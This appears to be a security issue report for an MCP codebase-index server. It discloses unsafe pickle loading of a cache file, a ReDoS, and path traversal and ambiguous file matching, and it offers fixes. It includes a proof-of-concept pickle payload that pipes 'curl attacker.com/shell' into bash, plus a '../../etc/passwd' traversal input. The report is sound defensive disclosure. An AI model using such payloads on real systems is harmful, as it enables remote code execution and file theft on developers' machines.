Security: pickle.load() without integrity check enables arbitrary code execution #4
Description
Summary
The cache loading in server.py uses pickle.load() to deserialize .codebase-index-cache.pkl before any validation. Since pickle.load() executes arbitrary code at deserialization time, the isinstance() checks that follow offer zero protection.
Vulnerable code
# server.py lines ~183-201
def _load_cache(project_root: str) -> "ProjectIndex | None":
    path = _cache_path(project_root)
    if not os.path.exists(path):
        return None
    try:
        with open(path, "rb") as f:
            payload = pickle.load(f)  # <-- code executes HERE
        if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
            return None
        index = payload["index"]
        if not isinstance(index, PI):
            return None
        return index
    # ... (the except clause of this try block is not part of the excerpt)
Attack vector
Any process with write access to the project directory can plant a malicious .codebase-index-cache.pkl:
import pickle, os
class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell | bash",))
with open(".codebase-index-cache.pkl", "wb") as f:
    pickle.dump({"version": 1, "index": Exploit()}, f)
On the next MCP server start (or first tool call), _ensure_index() -> _load_cache() runs the payload with the privileges of the MCP server process.
A malicious actor could also commit the file to a public repo. Any developer who clones it and starts the MCP server would then run the payload without any warning.
Suggested fix
Option A: Replace pickle with JSON (recommended). Serialize only the structural metadata (dicts, lists, strings, ints). JSON parsing produces plain data and never invokes callables, so this removes the code-execution path entirely.
Option B — SafeUnpickler with allowlist:
import pickle
_SAFE_MODULES = {"mcp_codebase_index.models", "mcp_codebase_index.project_indexer"}
class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in _SAFE_MODULES:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)
payload = SafeUnpickler(f).load()
Additional findings from the same audit
- ReDoS in search_codebase (query_api.py): user-supplied regex applied to every line with no timeout. Mitigation: regex library with timeout=2.0 or signal.alarm.
- Path traversal in reindex_file (project_indexer.py ~L186): ../../etc/passwd not validated against root. Fix: if rel_path.startswith(".."): raise ValueError.
- Ambiguous endswith matching in _resolve_file (query_api.py ~L233): can return unintended files.
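The two path-related findings above could be handled along these lines. This is a sketch, not the project's code: resolve_inside_root and match_by_path_suffix are hypothetical helper names, and the assumption about _resolve_file is that a plain string endswith lets a query such as utils.py also match myutils.py. The containment check compares resolved paths instead of testing for a leading "..", so it also catches inputs like a/../../x and absolute paths.

```python
import os


def resolve_inside_root(project_root: str, rel_path: str) -> str:
    """Return the resolved path for rel_path, or raise ValueError if it
    would land outside project_root."""
    root = os.path.realpath(project_root)
    # realpath collapses ".." segments and follows symlinks, so the
    # comparison below is made on the path that would actually be opened.
    candidate = os.path.realpath(os.path.join(root, rel_path))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes project root: {rel_path!r}")
    return candidate


def match_by_path_suffix(known_paths: list[str], query: str) -> list[str]:
    """Return the known paths whose trailing path components equal the
    components of query (whole components, not raw string suffixes)."""
    parts = query.replace("\\", "/").strip("/").split("/")
    matches = []
    for path in known_paths:
        path_parts = path.replace("\\", "/").split("/")
        if path_parts[-len(parts):] == parts:
            matches.append(path)
    return matches
```

A caller could treat more than one match from match_by_path_suffix as ambiguous and ask for a longer path, rather than silently picking the first hit.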
Environment
Discovered during a local security audit before production deployment. Cache files added to .gitignore as interim mitigation. Happy to submit a PR.